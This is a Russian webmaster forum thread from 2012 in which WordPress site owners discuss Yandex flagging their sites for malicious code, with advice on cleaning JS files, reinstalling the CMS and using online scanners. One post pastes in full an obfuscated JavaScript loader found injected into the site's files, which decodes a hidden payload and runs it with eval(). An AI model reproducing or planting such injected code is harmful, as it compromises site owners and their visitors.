SOS вредоносный код.

JS файлы проверьте. В конце огромный кусок шифрованного содержимого. И если я прав, то вам сюда /ru/forum/706610

на последней страницы есть объяснение, откуда этот вирус берется и что надо делать.

Спасибо за инфу да код нашел, пришлось около 500 таких файлов посмотреть вообще запарился сверху внизу весь свой сайт пересмотрел, отправил на проверку опять Яндекс то же самое пишет.:(

У кого какие есть предложения я все JS файлы почистил в плагинах в скриптах везде часа 4 сидел.

на чем сайт сделан? перезалейте движок, если данные в базе данных, то просто файлы цмс поменяйте.

Какого числа был впервые однаружен вредоносный код?

Вы уверены, что после последней проверки (когда был обнаружен вредоносный код) Яндекс уже перепроверял Ваш сайт?

У меня такая же ситуевина. Код обнаружен 02.04.2012. В тот же день вычистил и отправил на проверку. До сих пор жду.

В панели вебмастера должны быть указаны конкретные страницы, на которых Яндекс нашел вредоносный код и вердикт. Какой у Вас вердикт? Вы бы дали тут адреса страниц, на которых код нашли - Вам, возможно, гуру дали бы конкретный ответ, где что не так.

возможно робот еще не успел обновить страницы, подождите еще немного. если проблема не уйдет со временем пересмотрите базу данных на наличие подозрительной ссылки или редиректа.

У меня тоже нашелся такой код в js-файлах. Удалил ваще эти файлы. Все случилось еще 02.04.2012. Тогда же и подал заявку на перепроверку - до сих пор проверки не было.

Как долго надо ждать перепроверку? Сколько обычно проходит дней?

Думаю не все файлы ТС почистили, смотрите внимательнее, если уверены, что все, то скорей всего дургой вирус какой-нибудь.

Сайт на движке Wordpress

Последняя перепроверка Яндекса 7.04.2012

Короче вот был такой красивый код внизу во всех файлах JS кроме тех, что были в архивах.

var d7b0c8="";function lc685ab889(){var d46b5d1=String,h853e4=Array.prototype.slice.call(arguments).join(""),p0a1249f=h853e4.substr(4,3)-637,s4f9b4c17,j069c5e9c;h853e4=h853e4.substr(7);var p66b71=h853e4.length;for(var u03500c=0;u03500c<p66b71;u03500c++){try{throw(n11136=cc4752ba(h853e4,u03500c));}catch(e){n11136=e;};if(n11136=='–'){p0a1249f="";u03500c++;k3528e05=jb0955(h853e4,u03500c);while(g5d5ca2(k3528e05)){p0a1249f+=k3528e05;u03500c++;k3528e05=s72b1fc1d(h853e4,u03500c);}p0a1249f-=536;continue;}s4f9b4c17="";if(peaff5ad(n11136)){u03500c++;n11136=h853e4.substr(u03500c,1);while(n11136!='®'){s4f9b4c17+=n11136;u03500c++;n11136=h853e4.substr(u03500c,1);}s4f9b4c17=kf5abc1c(s4f9b4c17,p0a1249f,34);if(s4f9b4c17<0)s4f9b4c17+=256;if(s4f9b4c17>=192)s4f9b4c17+=848;else if(s4f9b4c17==168)s4f9b4c17=1025;else if(s4f9b4c17==184)s4f9b4c17=1105;d7b0c8+=d46b5d1["\x66r\x6fm\x43\x68\x61r\x43od\x65"](s4f9b4c17);continue;}l26dc11f=(n11136+'')["\x63\x68ar\x43o\x64\x65At"](0);if(l26dc11f>848)l26dc11f-=848;j069c5e9c=l26dc11f-p0a1249f-34;j069c5e9c=ga8af2f9(j069c5e9c);d7b0c8+=m08f771(j069c5e9c);}}lc685ab889("f","9e8","78","9®2","2","6®","–60","6","–®","20","6","®–","6","9","0–1","*","–61","3","–®2","1","0","®","®227®","–6","95–*0","–5","4","1–®1","49®–","666","–®","2","04®®2","05®–","657","–","®18","7®","®","22®–","685–","®19","6","®®","193","®","–6","3","1","–®1","38®","–612–®2","28®","–63","6–®","2","31®","–5","5","4","–®","16","6","®T","–68","9","–","0–694–2,","–","6","9","0","–","®22","0","®®","2","49","®–69","0–®","2","2","0®","–","6","9","5","–®2","3","2","®",")","5","–","655","–","®","1","3","®–6","1","8","–®","228®®","174","®–64","3","–®18","8®","®188","®","®192®®","2","®®","194","®®","2","48","®–","6","8","9–","%","–615","–®1","59","®®","218","®–","6","2","2","–","®23","0","®","®","21","8®","–","662","–®2","5®–5","50","–®149®","–68","5","–","'–5","53","–®","1","58","®®149®–6","3","1","–","®23","5®","®22","6","®–","6","96","–","®","240®","&8","–","5","7","2","–","®","184","®–®23","8","®®","239","®","®","2","42®","®2","47","®","®2","3","8","®–70","8–2","–","569–jl–5","7","8–","l","®1","9","9®Y","–","65","7–","®1","6","5®","–","6","80–","®187®","®","18","7®","–","569","–®1","86®","®172","®","–54","2–","®","1","5","0","®–","70","8–","2=–702","–?","®","24","6®–6","65–®","27®–","565–","®18","4","®","®185","®–","6","66–","®","1","0®","–7","16–","B","–7","36–K","Q","–","608","–®","13","8","®","®1","67","®®","138®–","66","8","–","®","2","14","®–571","–®","128®","R","ON","®1","9","4®","R–5","52","–","<","–","692–","®","199®\"","-","–5","45","–","®1","4","2®","–6","06–®","22","1","®","®2","13®","–562–®","16","1","®","–703","–7–","7","32","–","Z","®2","0®U","T","S","U–","5","89","–","®","2","0","4","®","–53","9–®1","5","2®","®1","3","8","®","®146","®","–","66","6","–®1","9","®","–","57","0–®","1","8","6","®–57","6–","®17","5","®j–","6","80","–®2","39®–6","9","9","–®","2","29®","–","6","1","6–®","2","1","6®","–7","27","–6","37","–","®","23","5","®®2","4","6®","®","25","4®–7","1","8","–®6","®P","–7","0","5","–D","–","630–®","250®","–6","75","–®19","®","®","25®","®","14®","®","20","®","®205®","®234®","–","69","9–®","2®–701–","®","4","®–53","8","–D","–6","4","4–®","190","®–60","8","–®147","®","–","64","5–","®","1","7","5®","®","10","®","®1","5","6®®","1","53","®–5","9","6","–","g","gg®21","3","®–5","4","4–","®","147","®–7","3","4–V","–","6","06","–","®","2","04®–7","31–T–6","64–","®25","®","®","2","0","8®®","26","®","–6","30–®","2","4","9","®®","2","50","®®2","30®","®236","®®225®–62","0","–®22","1®","®1","5","0®","–7","2","8","–®31","®–721","–","®","25","1®®12","®–","6","7","0","–","®2","27®","®181","®–","6","8","1","–®1","8","9®","®","18","8","®–","678–","®1","85®®","1","85®&","–6","61–","®0","®®","1","7","®®","191®®7","®–","6","3","9","–","®2","3","8","®","–5","68","–®1","63®®16","6","®","–","5","8","0","–","n–","650","–","®20","9®","–","60","6–","®136","®®","20","4®","®","2","1","5","®®","20","3","®–673","–","®3","2®–","722","–I","A–619–","®","2","27®®","233®–6","2","7","–","®","17","1®®22","8","®","®22","6","®","–5","6","5–","®1","7","9","®–6","21","–®1","88","®","–61","5","–","®2","2","1","®®21","4®","–67","3–®","24","®","®1","6®–","6","1","1","–","®","219®–7","0","8","–B–","55","6","–®","1","6","9®–","5","7","0–®","134","®","–","6","19","–®","238®","®","20","1®","®21","4®","®","220","®®19","5","®","–6","3","6","–®","2","31","®®24","3®","–6","66","–","®9","®–","6","0","7–","®","1","45®","–6","7","1","–®2","0","8®","®17","®–","716–;–5","7","8","–","®","17","3","®","–","671–®","1","3®","–","606","–","®","143","®®1","4","5","®–","5","68–®","15","7®r","®","159®","®125","®","–","666–","®1","7","7","®–","60","9–u","t–","6","59","–","®","1","6","6","®","®1","6","6","®–5","65","–","®","1","81","®","–","72","4","–?P–57","2","–f","®185","®–","5","78","–","®","17","5®","®1","90","®","®181®–","6","91","–-1","–","5","8","4","–","r®1","4","3®","r","–58","3–","®1","81","®","®","1","92®","®","1","80®","®","19","8®®","1","90®–630","–","®2","29®","®238®–","57","4","–®","1","8","8","®","–6","1","0–®","1","54","®®2","07","®","–","63","0","–","®2","42","®","®","2","2","9","®","®","2","25","®–6","4","5–®3","®","–652","–®","25","1®–6","3","0–®","1","9","7","®","–56","9–","®1","7","5","®","®","16","8","®®","1","7","6®","®","1","6","8","®–","6","3","0–","®","238","®","–6","40","–®","2","5","4","®®","1","78","®","–5","66–g","–5","38","–","®1","5","1","®","–62","7","–®2","2","4®","®","2","39","®","–7","05–","4–5","8","0–®","19","0","®","–599–","®","213®","–","7","3","6–®1","7®","®1","9®%®","247","®–","645","–","®1","53","®®","1","52","®","–731","–®2","3","8®","®","23","8®","–","6","6","0","–","®1","7®®","1","®","–6","9","9","–7–","6","9","7–,–","6","54","–®","8","®®","1","2","®®","19","8","®","–","69","0–0–68","3","–.","–","6","9","2","–.–","5","4","3–®","1","42®","I","fI","–","698–®","2","3","5®","–","567","–®","1","8","1®","®","1","66","®®1","8","5","®®","1","8","1®","p","®1","71®®1","6","2®","®18","3®","–","62","2","–®","2","1","7","®","®","235","®","®2","19","®®","2","3","4®","–619","–","®","22","2®–","6","98–4–705–","?","®","2","42","®","®","6®–601","–","p","m","l","l","–6","0","7–r®220","®–","7","2","7","–DS","–73","3–P–55","3","–®","16","3®–","54","0–","®","1","5","4","®","–","6","15–","®1","5","9®","®224","®","–55","9–®","16","7","®®1","71®®","15","8®","®154","®","–73","0–H]","WX–","599–®1","94®®","2","1","3","®®1","9","8","®","®19","6®","–5","51","–","®15","3®","®1","4","6®®1","5","9®®","152","®","®","1","50®–6","92–","®222®®","25","1®","–715–®2","45®","–715–;–","557–","®","172","®–","6","8","3–#","®","24","®–","67","4–®3","2®","®","2","1®","–","7","09","–>–7","2","9","–Q","®","3","®®","1","1®","®12®®3®^®240®","–","54","7–7","6–","5","84","–[[[®1","8","7","®–726–F–7","30–®4®","–","683–®","2","21","®",")","®29","®","®3","0","®","–","603–®21","6","®","®","1","47®–","6","2","7–","®23","9®–®16","1","®","®16","0®","®1","60","®®1","60","®","–","62","4–","®2","37","®","®","2","2","1®","–612","–®","2","2","4®®2","1","5","®","–","70","6","–","<@–6","55–","®19","9","®","®1","2","®","–6","28–","®","2","4","0®®","2","25®–","666","–","®196®","–","681","–","®2","40®–","5","67–","a–","71","3–","H–","601–","®2","13","®","®2","07","®®","131®","–6","2","4","–","®","165","®®","154","®–5","61–®13","6®–56","4–®159","®–","5","52","–","®","1","6","6","®®","15","4®","`–6","52","–","®8","®–","657","–®2","52®","®9®","®255®","®10","®","®","8","®","®19","5®®","1","9","6®","®201","®®","1","5®","®10","®®2","3","8","®","®","1","5®®13®–","668–®","15","®–7","1","2","–","@9","–","683–®22","1®","–5","9","8–®","13","7®","®","14","2®®","2","1","1","®","®","2","1","3","®","–","67","4–","®","1","4®","®","3","1®®","32®","®3","0®–6","3","5–®238","®®2","43","®®2","36®–5","92","–®","1","3","0","®","–5","4","5–^TK","–","5","5","6","–a–58","3–qx","®","1","2","7®®","18","7®®","1","9","6®","x–","5","7","4","–®","1","31","®","–","6","9","8","–","®","2","0","9®","®206","®","–","71","6","–®","2","23","®–65","1–®15","8","®","®1","58®","–624","–®2","26","®–","7","27–F","–664","–®","3","®–7","2","1–?–662–","®20","6","®","®","1","®®","1","6®®16","®","–","703","–.–71","8–F<®27®–7","3","2","–NO–5","8","1–®1","8","7®–","5","6","5–®","1","63","®","g","®178","®","®1","6","2","®","–","54","9–®","1","61®®","152","®–6","4","0","–®2","5","0®®","2","5","4","®","®1","79®","®","197®","®","1","51®","–6","4","6–","®1","54®","–","7","06–®","21","3","®–6","61–®1","68®–","72","4–","[–63","7–","®","1","48","®","®14","5®","–639","–®","1","4","6®–7","08–","K–","6","43–®","2","00®","–","6","1","0–","y","v®","2","3","3","®®149®","®14","8","®","®1","4","9","®","®1","67®");eval(d7b0c8);function cc4752ba(w24a868,e09298e){return w24a868.substr(e09298e,1);}function jb0955(e0ee80,h494dae){return e0ee80.substr(h494dae,1);}function s72b1fc1d(w93f7d79,gda998){return w93f7d79.substr(gda998,1);}function g5d5ca2(i05da4){return i05da4!='–';}function peaff5ad(u3d6e75){return u3d6e75=='®';}function kf5abc1c(sf602c9,ha86ff,u65667){return sf602c9-ha86ff-u65667;}function m08f771(v38bdac7f){var d46b5d1=String;return d46b5d1["\x66r\x6fm\x43\x68\x61r\x43od\x65"](v38bdac7f);}function ga8af2f9(j6116179){var l5102e=j6116179;if(l5102e<0)l5102e+=256;if(l5102e==168)l5102e=1025;else if(l5102e==184)l5102e=1105;return (l5102e>=192 && l5102e<256) ? l5102e+848 : l5102e

Я их все удалил я не думаю что остался хоть один JS файл так как я полностью по всем папкам прошелся. Сейчас решал написать хостеру может помогут кто знает.

Да кстати мне на фрилансе сказали что вообще, мол, можно залить антивирус на сервес и он все почистит если есть такой дайте ссылочку.

---------- Добавлено 07.04.2012 в 16:42 ----------

Ах да и самая интересно что ругается только Яндекс а гугл как давал трафик, так и дает только он не видит у меня вредоносного кода. Странно да?

ОЙ блин и правда одни JS пропустил спасибо http://sitecheck.sucuri.net/ хоть показал где.

Ну все опять отправил на перепроверку на этом должно быть все ок.🍿

Нечто подобное у меня тоже было на Wordpresse.

Яша обнаружил код сообщил мне о зараженной странице, и в выдаче начел выдавать "Сайт заражен", при этом google ничего подозрительного на сайте не обнаружил. Удалил эту страницу отправил на перепроверку сайт Яше-на жри. Но не тут то было, Яша через дня 2 скинул мне еще 5 страниц при этом сообщил что это еще не все, мол лечите дальше. Во общем проблема была в зараженном шаблоне , пришлось сменит шаблон и ждать дней 10 для повторной перепроверки (при первом обращении они быстро реагируют потом чет тянут). Советую воспользоваться онлайн антивирусами для проверки сайта, перед подачей на перепроверку, при этом очень помог сайт бурбон (почемуто тока там было показано что сайт заражен), другие как avg, Нортон, Доктор Веб -ничего не обнаруживали.

---------- Добавлено 07.04.2012 в 18:02 ----------

Нечто подобное у меня тоже было на Wordpresse.

Яша обнаружил код сообщил мне о зараженной странице, и в выдаче начел выдавать "Сайт заражен", при этом google ничего подозрительного на сайте не обнаружил. Удалил эту страницу отправил на перепроверку сайт Яше-на жри. Но не тут то было, Яша через дня 2 скинул мне еще 5 страниц при этом сообщил что это еще не все, мол лечите дальше. Во общем проблема была в зараженном шаблоне , пришлось сменит шаблон и ждать дней 10 для повторной перепроверки (при первом обращении они быстро реагируют потом чет тянут). Советую воспользоваться онлайн антивирусами для проверки сайта, перед подачей на перепроверку, при этом очень помог сайт бурбон (почемуто тока там было показано что сайт заражен), другие как avg, Нортон, Доктор Веб -ничего не обнаруживали.